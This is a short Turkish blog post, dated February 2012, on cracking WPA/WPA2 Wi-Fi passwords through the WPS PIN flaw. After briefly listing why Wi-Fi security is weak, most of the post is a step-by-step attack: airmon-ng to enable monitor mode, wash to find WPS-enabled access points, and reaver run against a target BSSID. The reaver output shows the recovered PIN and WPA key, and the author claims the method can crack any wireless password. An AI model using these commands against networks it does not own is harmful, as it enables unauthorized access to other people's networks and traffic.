WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak

16 Şubat 2012 Perşembe

Bana göre Wi-Fi ağlar’da henüz istenilen düzeyde security uygulanamıyor. Bunun nedenleri;

1- Kullanıcı bilgi yetersizliği

2- Halen wireless şifrelerimiz WPA2 değil

3- MAC filtreleme kullanmıyoruz.

4- WPS’ in açıkları.

WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir.Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar.

Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.

Örnek Airmon saldırısı:

#airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

# wash -i mon0 –C [Burada MAC adreslerini veremeyeceğim :) ]

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID

# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f –x298 (WPA PSK: KISMINA DİKKAT)

[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ’47128211′
[+] WPA PSK: ‘ŞİFRE’
[+] AP SSID: ‘ERCUMENT’

[+] Nothing done, nothing to save.

Takribi WPS airmon şifre kırma saldırısı kimi duruma göre 1 saati geçebilir ama tüm wireless şifrelerini kırabilecek düzeyde olduğunu söyleyebilirim.


Share/Bookmark

0 comments :